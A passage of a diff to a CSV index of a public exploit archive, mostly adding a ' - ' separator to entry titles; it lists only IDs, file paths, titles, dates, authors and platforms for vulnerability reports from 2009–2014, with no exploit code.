0.6.2 'mod' Parameter Local File Disclosure Vulnerability",2009-10-27,"Greg Miernicki",php,webapps,0 33309,platforms/php/webapps/33309.txt,"TFTgallery 0.13 'album' Parameter Cross Site Scripting Vulnerability",2009-10-26,blake,php,webapps,0 33310,platforms/multiple/remote/33310.nse,"VMware Server <= 2.0.1,ESXi Server <= 3.5 Directory Traversal Vulnerability",2009-10-27,"Justin Morehouse",multiple,remote,0 -33311,platforms/linux/remote/33311.txt,"KDE <= 4.3.2 Multiple Input Validation Vulnerabilities",2009-10-27,"Tim Brown",linux,remote,0 +33311,platforms/linux/remote/33311.txt,"KDE <= 4.3.2 - Multiple Input Validation Vulnerabilities",2009-10-27,"Tim Brown",linux,remote,0 33312,platforms/linux/dos/33312.txt,"Mozilla Firefox <= 3.5.3 Floating Point Conversion Heap Overflow Vulnerability",2009-10-27,"Alin Rad Pop",linux,dos,0 33313,platforms/linux/remote/33313.txt,"Mozilla Firefox <= 3.5.3 and SeaMonkey <= 1.1.17 'libpr0n' GIF Parser Heap Based Buffer Overflow Vulnerability",2009-10-27,regenrecht,linux,remote,0 33314,platforms/linux/dos/33314.html,"Mozilla Firefox <= 3.0.14 - Remote Memory Corruption Vulnerability",2009-10-27,"Carsten Book",linux,dos,0 -33315,platforms/linux/remote/33315.java,"Sun Java SE November 2009 Multiple Security Vulnerabilities (1)",2009-10-29,Tometzky,linux,remote,0 -33316,platforms/multiple/remote/33316.java,"Sun Java SE November 2009 Multiple Security Vulnerabilities (2)",2009-10-29,Tometzky,multiple,remote,0 +33315,platforms/linux/remote/33315.java,"Sun Java SE November 2009 - Multiple Security Vulnerabilities (1)",2009-10-29,Tometzky,linux,remote,0 +33316,platforms/multiple/remote/33316.java,"Sun Java SE November 2009 - Multiple Security Vulnerabilities (2)",2009-10-29,Tometzky,multiple,remote,0 33317,platforms/php/webapps/33317.txt,"AlienVault OSSIM 4.6.1 - Authenticated SQL Injection",2014-05-12,"Chris Hebert",php,webapps,443 33318,platforms/bsd/dos/33318.txt,"OpenBSD 4.6 and NetBSD 5.0.1 'printf(1)' Format String Parsing Denial of Service Vulnerability",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0 33319,platforms/bsd/dos/33319.txt,"Multiple BSD Distributions 'printf(3)' Memory Corruption Vulnerability",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0 -33320,platforms/php/webapps/33320.txt,"TFTgallery 0.13 'sample' Parameter Cross Site Scripting Vulnerability",2009-11-02,blake,php,webapps,0 +33320,platforms/php/webapps/33320.txt,"TFTgallery 0.13 - 'sample' Parameter Cross Site Scripting Vulnerability",2009-11-02,blake,php,webapps,0 33321,platforms/linux/local/33321.c,"Linux Kernel 2.6.x - 'pipe.c' Local Privilege Escalation Vulnerability (1)",2009-11-03,"teach & xipe",linux,local,0 33322,platforms/linux/local/33322.c,"Linux Kernel 2.6.x - pipe.c Local Privilege Escalation Vulnerability (2)",2009-11-03,"teach & xipe",linux,local,0 33326,platforms/windows/remote/33326.py,"Easy Chat Server 3.1 - Stack Buffer Overflow",2014-05-12,superkojiman,windows,remote,0 @@ -30024,7 +30024,7 @@ id,file,description,date,author,platform,type,port 33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80 33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 (.ogg) - Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0 33336,platforms/linux/local/33336.txt,"Linux Kernel 3.3 < 3.8 - SOCK_DIAG Local Root Exploit",2013-02-24,SynQ,linux,local,0 -33337,platforms/osx/dos/33337.c,"Apple Mac OS X 10.5.x 'ptrace' Mutex Handling Local Denial of Service Vulnerability",2009-11-04,"Micheal Turner",osx,dos,0 +33337,platforms/osx/dos/33337.c,"Apple Mac OS X 10.5.x - 'ptrace' Mutex Handling Local Denial of Service Vulnerability",2009-11-04,"Micheal Turner",osx,dos,0 33338,platforms/linux/dos/33338.c,"Linux Kernel 2.6.x - 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty",2009-11-09,"Robin Getz",linux,dos,0 33339,platforms/linux/remote/33339.txt,"CUPS 'kerberos' Parameter Cross Site Scripting Vulnerability",2009-11-09,"Aaron Sigel",linux,remote,0 33340,platforms/php/webapps/33340.txt,"CuteNews 1.4.6 index.php Multiple Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0 @@ -30033,7 +30033,7 @@ id,file,description,date,author,platform,type,port 33343,platforms/php/webapps/33343.txt,"CuteNews 1.4.6 register.php result Parameter XSS",2009-11-10,"Andrew Horton",php,webapps,0 33344,platforms/php/webapps/33344.txt,"CuteNews 1.4.6 index.php New User Creation CSRF",2009-11-10,"Andrew Horton",php,webapps,0 33345,platforms/php/webapps/33345.txt,"CuteNews 1.4.6 editnews Module doeditnews Action Admin Moderation Bypass",2009-11-10,"Andrew Horton",php,webapps,0 -33346,platforms/jsp/webapps/33346.txt,"McAfee Network Security Manager 5.1.7 Multiple Cross Site Scripting Vulnerabilities",2009-11-06,"Daniel King",jsp,webapps,0 +33346,platforms/jsp/webapps/33346.txt,"McAfee Network Security Manager 5.1.7 - Multiple Cross Site Scripting Vulnerabilities",2009-11-06,"Daniel King",jsp,webapps,0 33347,platforms/jsp/webapps/33347.txt,"McAfee Network Security Manager 5.1.7 Information Disclosure Vulnerability",2009-11-06,"Daniel King",jsp,webapps,0 33348,platforms/windows/dos/33348.pl,"TFTPD32 4.5 / TFTPD64 4.5 - DoS PoC",2014-05-14,"Martinez FrostCard",windows,dos,0 33350,platforms/windows/dos/33350.xml,"Yahoo! Messenger 9 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service Vulnerability",2009-11-12,HACKATTACK,windows,dos,0 @@ -30053,10 +30053,10 @@ id,file,description,date,author,platform,type,port 33364,platforms/linux/remote/33364.txt,"KDE 4.3.3 KDELibs 'dtoa()' Remote Code Execution Vulnerability",2009-11-20,"Maksymilian Arciemowicz",linux,remote,0 33365,platforms/php/webapps/33365.txt,"WordPress WP-PHPList Plugin 2.10.2 'unsubscribeemail' Parameter Cross-Site Scripting Vulnerability",2009-11-29,MustLive,php,webapps,0 33366,platforms/php/webapps/33366.txt,"WordPress Trashbin Plugin 0.1 'mtb_undelete' Parameter Cross-Site Scripting Vulnerability",2009-11-15,MustLive,php,webapps,0 -33367,platforms/php/webapps/33367.txt,"FireStats WordPress Plugin 1.0.2 Multiple Cross Site Scripting and Authentication Bypass Vulnerabilities (1)",2009-11-24,MustLive,php,webapps,0 -33368,platforms/php/webapps/33368.html,"FireStats WordPress Plugin 1.0.2 Multiple Cross Site Scripting and Authentication Bypass Vulnerabilities (2)",2009-11-24,MustLive,php,webapps,0 +33367,platforms/php/webapps/33367.txt,"FireStats WordPress Plugin 1.0.2 - Multiple Cross Site Scripting and Authentication Bypass Vulnerabilities (1)",2009-11-24,MustLive,php,webapps,0 +33368,platforms/php/webapps/33368.html,"FireStats WordPress Plugin 1.0.2 - Multiple Cross Site Scripting and Authentication Bypass Vulnerabilities (2)",2009-11-24,MustLive,php,webapps,0 33370,platforms/multiple/webapps/33370.html,"ElasticSearch Remote Code Execution",2014-05-15,"Jeff Geiger",multiple,webapps,0 -33371,platforms/php/webapps/33371.txt,"WordPress WP-Cumulus Plugin 1.x 'tagcloud.swf' Cross-Site Scripting Vulnerability",2009-11-09,MustLive,php,webapps,0 +33371,platforms/php/webapps/33371.txt,"WordPress WP-Cumulus Plugin 1.x - 'tagcloud.swf' Cross-Site Scripting Vulnerability",2009-11-09,MustLive,php,webapps,0 33372,platforms/php/webapps/33372.html,"Fuctweb CapCC Plugin 1.0 for WordPress CAPTCHA Security Bypass Vulnerability",2009-11-13,MustLive,php,webapps,0 33373,platforms/php/webapps/33373.txt,"Subscribe to Comments 2.0 WordPress Plugin Multiple Cross Site Scripting Vulnerabilities",2009-11-16,MustLive,php,webapps,0 33374,platforms/php/webapps/33374.txt,"Cacti 0.8.x graph.php Multiple Parameter XSS",2009-11-21,"Moritz Naumann",php,webapps,0 @@ -30065,18 +30065,18 @@ id,file,description,date,author,platform,type,port 33377,platforms/php/webapps/33377.txt,"Joomla! ProofReader 1.0 RC9 Component Cross-Site Scripting Vulnerability",2009-11-16,MustLive,php,webapps,0 33378,platforms/php/webapps/33378.txt,"Joomla! 1.5.x 404 Error Page Cross Site Scripting Vulnerability",2009-11-23,MustLive,php,webapps,0 33379,platforms/multiple/remote/33379.txt,"Apache Tomcat 3.2 404 Error Page Cross Site Scripting Vulnerability",2009-09-02,MustLive,multiple,remote,0 -33380,platforms/php/webapps/33380.txt,"Power Phlogger 2.2.x Cross-site Scripting Vulnerability",2008-02-16,MustLive,php,webapps,0 +33380,platforms/php/webapps/33380.txt,"Power Phlogger 2.2.x - Cross-site Scripting Vulnerability",2008-02-16,MustLive,php,webapps,0 33381,platforms/php/webapps/33381.txt,"Content Module 0.5 for XOOPS 'id' Parameter SQL Injection Vulnerability",2009-11-30,s4r4d0,php,webapps,0 -33382,platforms/php/webapps/33382.txt,"SmartMedia Module 0.85 Beta for XOOPS 'categoryid' Parameter Cross Site Scripting Vulnerability",2009-11-30,SoldierOfAllah,php,webapps,0 +33382,platforms/php/webapps/33382.txt,"SmartMedia Module 0.85 Beta for XOOPS - 'categoryid' Parameter Cross Site Scripting Vulnerability",2009-11-30,SoldierOfAllah,php,webapps,0 33383,platforms/php/webapps/33383.txt,"Elxis 'filename' Parameter Directory Traversal Vulnerability",2009-11-30,"cr4wl3r ",php,webapps,0 33384,platforms/windows/dos/33384.py,"Wireshark 1.10.7 - DoS PoC",2014-05-16,"Osanda Malith",windows,dos,0 -33385,platforms/php/webapps/33385.txt,"phpMyFAQ 2.5.4 and Prior Multiple Cross Site Scripting Vulnerabilities",2009-12-01,"Amol Naik",php,webapps,0 +33385,platforms/php/webapps/33385.txt,"phpMyFAQ < 2.5.4 - Multiple Cross Site Scripting Vulnerabilities",2009-12-01,"Amol Naik",php,webapps,0 33386,platforms/multiple/dos/33386.html,"Mozilla Firefox 29.0 - Null Pointer Dereference Vulnerability",2014-05-16,Mr.XHat,multiple,dos,0 33387,platforms/linux/local/33387.txt,"check_dhcp - Nagios Plugins <= 2.0.1 - Arbitrary Option File Read",2014-05-16,"Dawid Golunski",linux,local,0 33388,platforms/linux/remote/33388.f,"Xfig and Transfig 3.2.5 '.fig' File Buffer Overflow Vulnerability",2009-12-03,pedamachephepto,linux,remote,0 33389,platforms/php/webapps/33389.txt,"EGroupware 1.8.006 - Multiple Vulnerabilities",2014-05-16,"High-Tech Bridge SA",php,webapps,80 33390,platforms/php/webapps/33390.txt,"Yoast Google Analytics for WordPress Plugin 3.2.4 404 Error Page Cross Site Scripting Vulnerability",2009-12-04,intern0t,php,webapps,0 -33391,platforms/php/webapps/33391.txt,"YABSoft Advanced Image Hosting Script 2.x 'search.php' Cross Site Scripting Vulnerability",2009-12-07,"aBo MoHaMeD",php,webapps,0 +33391,platforms/php/webapps/33391.txt,"YABSoft Advanced Image Hosting Script 2.x - 'search.php' Cross Site Scripting Vulnerability",2009-12-07,"aBo MoHaMeD",php,webapps,0 33392,platforms/php/webapps/33392.txt,"YOOtheme Warp5 Joomla! Component 'yt_color' Parameter Cross Site Scripting Vulnerability",2009-12-04,andresg888,php,webapps,0 33393,platforms/php/webapps/33393.txt,"Joomla! You!Hostit! 1.0.1 Template Cross-Site Scripting Vulnerability",2009-12-04,andresg888,php,webapps,0 33394,platforms/php/webapps/33394.txt,"Invision Power Board <= 3.0.3 '.txt' File MIME-Type Cross Site Scripting Vulnerability",2009-12-09,Xacker,php,webapps,0 @@ -30101,8 +30101,8 @@ id,file,description,date,author,platform,type,port 33413,platforms/php/webapps/33413.txt,"Pluxml-Blog 4.2 'core/admin/auth.php' Cross Site Scripting Vulnerability",2009-12-17,Metropolis,php,webapps,0 33414,platforms/php/remote/33414.php,"PHP <= 5.2.11 'htmlspecialcharacters()' Malformed Multibyte Character Cross Site Scripting Vulnerability (1)",2009-12-17,hello@iwamot.com,php,remote,0 33415,platforms/php/remote/33415.php,"PHP <= 5.2.11 'htmlspecialcharacters()' Malformed Multibyte Character Cross Site Scripting Vulnerability (2)",2009-12-17,hello@iwamot.com,php,remote,0 -33416,platforms/php/webapps/33416.txt,"QuiXplorer 2.x 'lang' Parameter Local File Include Vulnerability",2009-12-17,"Juan Galiana Lara",php,webapps,0 -33417,platforms/php/webapps/33417.txt,"cPanel 11.x 'fileop' Parameter Multiple Cross Site Scripting Vulnerabilities",2009-12-17,RENO,php,webapps,0 +33416,platforms/php/webapps/33416.txt,"QuiXplorer 2.x - 'lang' Parameter Local File Include Vulnerability",2009-12-17,"Juan Galiana Lara",php,webapps,0 +33417,platforms/php/webapps/33417.txt,"cPanel 11.x - 'fileop' Parameter Multiple Cross Site Scripting Vulnerabilities",2009-12-17,RENO,php,webapps,0 33418,platforms/php/webapps/33418.txt,"Joomla! 'com_joomportfolio' Component 'secid' Parameter SQL Injection Vulnerability",2009-12-17,"Fl0riX and Snakespc",php,webapps,0 33419,platforms/php/webapps/33419.txt,"F3Site 2009 mod/poll.php GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0 33420,platforms/php/webapps/33420.txt,"F3Site 2009 mod/new.php GLOBALS[nlang] Parameter Traversal Local File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0 @@ -30129,7 +30129,7 @@ id,file,description,date,author,platform,type,port 33444,platforms/php/webapps/33444.txt,"DrBenHur.com DBHcms 1.1.4 'dbhcms_core_dir' Parameter Remote File Include Vulnerability",2009-12-28,Securitylab.ir,php,webapps,0 33445,platforms/php/webapps/33445.txt,"phpInstantGallery 1.1 'admin.php' Cross Site Scripting Vulnerability",2009-12-26,indoushka,php,webapps,0 33446,platforms/php/webapps/33446.txt,"Barbo91 'upload.php' Cross Site Scripting Vulnerability",2009-12-25,indoushka,php,webapps,0 -33447,platforms/php/webapps/33447.php,"FreeWebshop 2.2.9 R2 Multiple Remote Vulnerabilities",2009-12-29,"Akita Software Security",php,webapps,0 +33447,platforms/php/webapps/33447.php,"FreeWebshop 2.2.9 R2 - Multiple Remote Vulnerabilities",2009-12-29,"Akita Software Security",php,webapps,0 33448,platforms/php/webapps/33448.txt,"AzDGDatingMedium 1.9.3 'l' Parameter Multiple Cross Site Scripting Vulnerabilities",2009-12-29,indoushka,php,webapps,0 33449,platforms/php/webapps/33449.txt,"Conkurent PHPMyCart 1.3 Cross Site Scripting and Authentication Bypass Vulnerabilities",2009-12-31,indoushka,php,webapps,0 33450,platforms/php/webapps/33450.txt,"SendStudio 4.0.1 Cross Site Scripting and Security Bypass Vulnerabilities",2009-12-31,indoushka,php,webapps,0 @@ -30146,36 +30146,36 @@ id,file,description,date,author,platform,type,port 33461,platforms/php/webapps/33461.txt,"PHPCart 3.1.2 'search.php' Cross-Site Scripting Vulnerability",2010-01-01,indoushka,php,webapps,0 33462,platforms/php/webapps/33462.txt,"VirtuaSystems VirtuaNews Pro 1.0.4 'admin.php' Cross-Site Scripting Vulnerability",2010-01-01,indoushka,php,webapps,0 33463,platforms/php/webapps/33463.txt,"VisionGate 1.6 'login.php' Cross-Site Scripting Vulnerability",2010-01-01,indoushka,php,webapps,0 -33464,platforms/php/webapps/33464.txt,"Discuz! 2.0 Multiple Cross Site Scripting Vulnerabilities",2010-01-03,indoushka,php,webapps,0 +33464,platforms/php/webapps/33464.txt,"Discuz! 2.0 - Multiple Cross Site Scripting Vulnerabilities",2010-01-03,indoushka,php,webapps,0 33465,platforms/php/webapps/33465.txt,"SLAED CMS 2.0 'stop' Parameter Cross Site Scripting Vulnerability",2010-01-03,indoushka,php,webapps,0 33466,platforms/php/webapps/33466.txt,"pL-PHP 0.9 'index.php' Cross-Site Scripting Vulnerability",2010-01-04,indoushka,php,webapps,0 33467,platforms/php/webapps/33467.txt,"WMNews 'admin/wmnews.php' Cross-Site Scripting Vulnerability",2010-01-04,indoushka,php,webapps,0 33468,platforms/php/webapps/33468.txt,"MercuryBoard 1.1.5 'index.php' Cross-Site Scripting Vulnerability",2010-01-04,indoushka,php,webapps,0 -33469,platforms/php/webapps/33469.txt,"LXR 0.9.x Cross Referencer Multiple Cross Site Scripting Vulnerabilities",2010-01-05,"Dan Rosenberg",php,webapps,0 -33470,platforms/php/webapps/33470.txt,"LineWeb 1.0.5 Multiple Remote Vulnerabilities",2010-01-05,"Ignacio Garrido",php,webapps,0 +33469,platforms/php/webapps/33469.txt,"LXR 0.9.x - Cross Referencer Multiple Cross Site Scripting Vulnerabilities",2010-01-05,"Dan Rosenberg",php,webapps,0 +33470,platforms/php/webapps/33470.txt,"LineWeb 1.0.5 - Multiple Remote Vulnerabilities",2010-01-05,"Ignacio Garrido",php,webapps,0 33471,platforms/hardware/remote/33471.txt,"D-LINK DKVM-IP8 'auth.asp' Cross Site Scripting Vulnerability",2010-01-06,POPCORN,hardware,remote,0 33472,platforms/multiple/dos/33472.py,"Sun Java System Web Server 6.1/7.0 HTTP 'TRACE' Heap Buffer Overflow Vulnerability",2010-01-06,"Evgeny Legerov",multiple,dos,0 33473,platforms/php/webapps/33473.txt,"RoundCube Webmail 0.2 Cross Site Scripting Vulnerability",2010-01-06,"j4ck and Globus",php,webapps,0 33474,platforms/php/webapps/33474.txt,"Joomla! DM Orders Component 'id' Parameter SQL Injection Vulnerability",2010-01-07,NoGe,php,webapps,0 -33475,platforms/php/webapps/33475.txt,"dotProject 2.1.3 Multiple SQL Injection and HTML Injection Vulnerabilities",2010-01-07,"Justin C. Klein Keane",php,webapps,0 +33475,platforms/php/webapps/33475.txt,"dotProject 2.1.3 - Multiple SQL Injection and HTML Injection Vulnerabilities",2010-01-07,"Justin C. Klein Keane",php,webapps,0 33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS <= 7.1.1 Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0 33477,platforms/php/webapps/33477.txt,"Calendarix 0.7 'calpath' Parameter Remote File Include Vulnerability",2010-01-07,Saywhat,php,webapps,0 33478,platforms/php/webapps/33478.txt,"Joomla! Jobads 'type' Parameter SQL Injection Vulnerability",2010-01-08,N0KT4,php,webapps,0 -33479,platforms/osx/dos/33479.c,"Mac OS X 10.x 'libc/strtod(3)' Memory Corruption Vulnerability",2010-01-08,"Maksymilian Arciemowicz",osx,dos,0 -33480,platforms/linux/dos/33480.txt,"MATLAB R2009b 'dtoa' Implementation Memory Corruption Vulnerability",2010-01-08,"Maksymilian Arciemowicz",linux,dos,0 +33479,platforms/osx/dos/33479.c,"Mac OS X 10.x - 'libc/strtod(3)' Memory Corruption Vulnerability",2010-01-08,"Maksymilian Arciemowicz",osx,dos,0 +33480,platforms/linux/dos/33480.txt,"MATLAB R2009b - 'dtoa' Implementation Memory Corruption Vulnerability",2010-01-08,"Maksymilian Arciemowicz",linux,dos,0 33481,platforms/asp/webapps/33481.txt,"DevWorx BlogWorx 1.0 'forum.asp' Cross Site Scripting Vulnerability",2010-01-09,Cyber_945,asp,webapps,0 33482,platforms/php/webapps/33482.txt,"DigitalHive 'mt' Parameter Cross Site Scripting Vulnerability",2010-01-10,"ViRuSMaN ",php,webapps,0 33483,platforms/multiple/dos/33483.py,"Sun Java System Directory Server 7.0 'core_get_proxyauth_dn' Denial of Service Vulnerability",2010-01-10,Intevydis,multiple,dos,0 33484,platforms/php/webapps/33484.txt,"DeltaScripts PHP Links 1.0 'email' Parameter Cross Site Scripting Vulnerability",2010-01-11,Crux,php,webapps,0 33485,platforms/php/webapps/33485.txt,"Jamit Job Board 'post_id' Parameter Cross Site Scripting Vulnerability",2010-01-11,Crux,php,webapps,0 -33486,platforms/php/webapps/33486.txt,"@lex Guestbook 5.0 Multiple Cross Site Scripting Vulnerabilities",2010-01-11,"D3V!L FUCKER",php,webapps,0 +33486,platforms/php/webapps/33486.txt,"@lex Guestbook 5.0 - Multiple Cross Site Scripting Vulnerabilities",2010-01-11,"D3V!L FUCKER",php,webapps,0 33487,platforms/php/webapps/33487.txt,"PhPepperShop 2.5 'USER_ARTIKEL_HANDLING_AUFRUF.php' Cross-Site Scripting Vulnerability",2010-01-12,Crux,php,webapps,0 33488,platforms/php/webapps/33488.txt,"Active Calendar 1.2 '$_SERVER['PHP_SELF']' Variable Multiple Cross Site Scripting Vulnerabilities",2010-01-11,"Martin Barbella",php,webapps,0 33489,platforms/multiple/remote/33489.txt,"Ruby <= 1.9.1 WEBrick Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0 33490,platforms/multiple/remote/33490.txt,"nginx 0.7.64 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0 -33493,platforms/multiple/webapps/33493.txt,"Multiple Stored XSS in Mayan-EDMS web-based document management OS system",2014-05-24,"Dolev Farhi",multiple,webapps,0 +33493,platforms/multiple/webapps/33493.txt,"Multiple Stored XSS in Mayan-EDms web-based document management OS system",2014-05-24,"Dolev Farhi",multiple,webapps,0 33494,platforms/cgi/webapps/33494.txt,"Web Terra 1.1 - books.cgi Remote Command Execution",2014-05-24,"felipe andrian",cgi,webapps,0 -33495,platforms/windows/dos/33495.py,"Core FTP Server Version 1.2, build 535, 32-bit - Crash P.O.C.",2014-05-24,"Kaczinski Ramirez",windows,dos,0 +33495,platforms/windows/dos/33495.py,"Core FTP Server 1.2, build 535, 32-bit - Crash PoC",2014-05-24,"Kaczinski Ramirez",windows,dos,0 33497,platforms/multiple/remote/33497.txt,"AOLServer Terminal <= 4.5.1 Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0 33498,platforms/multiple/remote/33498.txt,"Varnish 2.0.6 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0 33499,platforms/multiple/remote/33499.txt,"thttpd <= 2.24 HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0 @@ -30186,7 +30186,7 @@ id,file,description,date,author,platform,type,port 33504,platforms/multiple/remote/33504.txt,"Boa Webserver 0.94.x Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0 33505,platforms/php/webapps/33505.txt,"Docmint 1.0/2.1 'id' Parameter Cross Site Scripting Vulnerability",2010-01-12,Red-D3v1L,php,webapps,0 33506,platforms/multiple/dos/33506.py,"Oracle Database - Remote Listener Memory Corruption Vulnerability",2010-01-12,"Dennis Yurichev",multiple,dos,0 -33507,platforms/php/webapps/33507.txt,"Simple PHP Blog 0.5.x 'search.php' Cross-Site Scripting Vulnerability",2010-01-12,Sora,php,webapps,0 +33507,platforms/php/webapps/33507.txt,"Simple PHP Blog 0.5.x - 'search.php' Cross-Site Scripting Vulnerability",2010-01-12,Sora,php,webapps,0 33508,platforms/linux/local/33508.txt,"GNU Bash <= 4.0 'ls' Control Character Command Injection Vulnerability",2010-01-13,"Eric Piel",linux,local,0 33509,platforms/php/webapps/33509.txt,"Joomla! 'com_tienda' Component 'categoria' Parameter Cross-Site Scripting Vulnerability",2010-01-13,FL0RiX,php,webapps,0 33510,platforms/php/webapps/33510.txt,"Tribisur 'cat' Parameter Cross Site Scripting Vulnerability",2010-01-13,"ViRuSMaN ",php,webapps,0 @@ -30198,20 +30198,20 @@ id,file,description,date,author,platform,type,port 33521,platforms/multiple/remote/33521.rb,"Symantec Workspace Streaming Arbitrary File Upload",2014-05-26,metasploit,multiple,remote,9855 33523,platforms/linux/local/33523.c,"Linux Kernel 2.6.x - 'fasync_helper()' Local Privilege Escalation Vulnerability",2009-12-16,"Tavis Ormandy",linux,local,0 33524,platforms/linux/dos/33524.txt,"OpenOffice 3.1 - '.csv' File Remote Denial of Service Vulnerability",2010-01-14,"Hellcode Research",linux,dos,0 -33525,platforms/php/remote/33525.txt,"Zend Framework <= 1.9.6 Multiple Input Validation Vulnerabilities and Security Bypass Weakness",2010-01-14,"draic Brady",php,remote,0 +33525,platforms/php/remote/33525.txt,"Zend Framework <= 1.9.6 - Multiple Input Validation Vulnerabilities and Security Bypass Weakness",2010-01-14,"draic Brady",php,remote,0 33526,platforms/php/webapps/33526.txt,"Technology for Solutions 1.0 'id' Parameter Cross Site Scripting Vulnerability",2010-01-14,PaL-D3v1L,php,webapps,0 33527,platforms/unix/dos/33527.py,"IBM Tivoli Directory Server 6.2 'ibmdiradm' Null Pointer Dereference Denial of Service Vulnerability",2006-04-01,Intevydis,unix,dos,0 33528,platforms/php/webapps/33528.txt,"Xforum 1.4 'nbpageliste' Parameter Cross Site Scripting Vulnerability",2010-01-14,"ViRuSMaN ",php,webapps,0 33529,platforms/php/webapps/33529.txt,"Joomla! 'com_marketplace' Component 1.2 'catid' Parameter Cross-Site Scripting Vulnerability",2010-01-14,"ViRuSMaN ",php,webapps,0 -33530,platforms/php/webapps/33530.txt,"LetoDMS 1.4.x 'lang' Parameter Local File Include Vulnerability",2010-01-15,"D. Fabian",php,webapps,0 -33531,platforms/multiple/dos/33531.py,"Zeus Web Server 4.x 'SSL2_CLIENT_HELLO' Remote Buffer Overflow Vulnerability",2010-01-15,Intevydis,multiple,dos,0 +33530,platforms/php/webapps/33530.txt,"LetoDms 1.4.x - 'lang' Parameter Local File Include Vulnerability",2010-01-15,"D. Fabian",php,webapps,0 +33531,platforms/multiple/dos/33531.py,"Zeus Web Server 4.x - 'SSL2_CLIENT_HELLO' Remote Buffer Overflow Vulnerability",2010-01-15,Intevydis,multiple,dos,0 33532,platforms/multiple/dos/33532.txt,"Oracle Internet Directory 10.1.2.0.2 'oidldapd' Remote Memory Corruption Vulnerability",2006-11-10,Intevydis,multiple,dos,0 33533,platforms/windows/dos/33533.html,"Gracenote CDDBControl ActiveX Control 'ViewProfile' Method Heap Buffer Overflow Vulnerability",2010-01-18,karak0rsan,windows,dos,0 33534,platforms/php/webapps/33534.txt,"TestLink <= 1.8.5 'order_by_login_dir' Parameter Cross Site Scripting Vulnerability",2010-01-18,"Prashant Khandelwal",php,webapps,0 33535,platforms/linux/remote/33535.txt,"SystemTap 1.0 'stat-server' Remote Arbitrary Command Injection Vulnerability",2010-01-15,"Frank Ch. Eigler",linux,remote,0 33536,platforms/multiple/remote/33536.txt,"Zenoss 2.3.3 - Multiple Cross Site Request Forgery Vulnerabilities",2010-01-18,"Adam Baldwin",multiple,remote,0 33538,platforms/windows/remote/33538.py,"Easy File Sharing FTP Server 3.5 - Stack Buffer Overflow",2014-05-27,superkojiman,windows,remote,21 -33540,platforms/windows/remote/33540.txt,"SurgeFTP 2.x 'surgeftpmgr.cgi' Multiple Cross Site Scripting Vulnerabilities",2010-01-18,indoushka,windows,remote,0 +33540,platforms/windows/remote/33540.txt,"SurgeFTP 2.x - 'surgeftpmgr.cgi' Multiple Cross Site Scripting Vulnerabilities",2010-01-18,indoushka,windows,remote,0 33541,platforms/php/webapps/33541.txt,"DataLife Engine 8.3 engine/inc/include/init.php selected_language Parameter Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 33542,platforms/php/webapps/33542.txt,"DataLife Engine 8.3 engine/inc/help.php config[langs] Parameter Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 33543,platforms/php/webapps/33543.txt,"DataLife Engine 8.3 engine/ajax/pm.php config[lang] Parameter Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 @@ -30230,7 +30230,7 @@ id,file,description,date,author,platform,type,port 33556,platforms/multiple/dos/33556.rb,"Wireshark CAPWAP Dissector - Denial of Service (msf)",2014-05-28,j0sm1,multiple,dos,5247 33557,platforms/php/webapps/33557.txt,"Sharetronix 3.3 - Multiple Vulnerabilities",2014-05-28,"High-Tech Bridge SA",php,webapps,80 33558,platforms/php/webapps/33558.txt,"cPanel and WHM 11.25 'failurl' Parameter HTTP Response Splitting Vulnerability",2010-01-21,Trancer,php,webapps,0 -33559,platforms/multiple/dos/33559.txt,"Sun Java System Web Server 7.0 Update 6 'admin' Server Denial of Service Vulnerability",2010-01-22,Intevydis,multiple,dos,0 +33559,platforms/multiple/dos/33559.txt,"Sun Java System Web Server 7.0 Update 6 - 'admin' Server Denial of Service Vulnerability",2010-01-22,Intevydis,multiple,dos,0 33560,platforms/multiple/dos/33560.txt,"Sun Java System Web Server 6.1/7.0 WebDAV Format String Vulnerability",2010-01-22,Intevydis,multiple,dos,0 33561,platforms/php/webapps/33561.txt,"OpenX 2.6.1 SQL Injection Vulnerability",2010-01-22,AndySoon,php,webapps,0 33562,platforms/multiple/remote/33562.html,"Google Chrome 3.0 Style Sheet Redirection Information Disclosure Vulnerability",2010-01-22,"Cesar Cerrudo",multiple,remote,0 @@ -30238,7 +30238,7 @@ id,file,description,date,author,platform,type,port 33564,platforms/jsp/webapps/33564.txt,"Jetty 6.1.x JSP Snoop Page Multiple Cross-Site Scripting Vulnerabilities",2009-10-24,aScii,jsp,webapps,0 33565,platforms/php/webapps/33565.txt,"PunBB 1.3 'viewtopic.php' Cross-Site Scripting Vulnerability",2010-01-24,s4r4d0,php,webapps,0 33566,platforms/php/webapps/33566.txt,"Joomla! 3D Cloud 'tagcloud.swf' Cross-Site Scripting Vulnerability",2010-01-26,MustLive,php,webapps,0 -33567,platforms/hardware/remote/33567.txt,"Cisco Secure Desktop 3.x 'translation' Cross Site Scripting Vulnerability",2010-01-26,"Matias Pablo Brutti",hardware,remote,0 +33567,platforms/hardware/remote/33567.txt,"Cisco Secure Desktop 3.x - 'translation' Cross Site Scripting Vulnerability",2010-01-26,"Matias Pablo Brutti",hardware,remote,0 33568,platforms/hardware/remote/33568.txt,"Novatel Wireless MiFi 2352 Password Information Disclosure 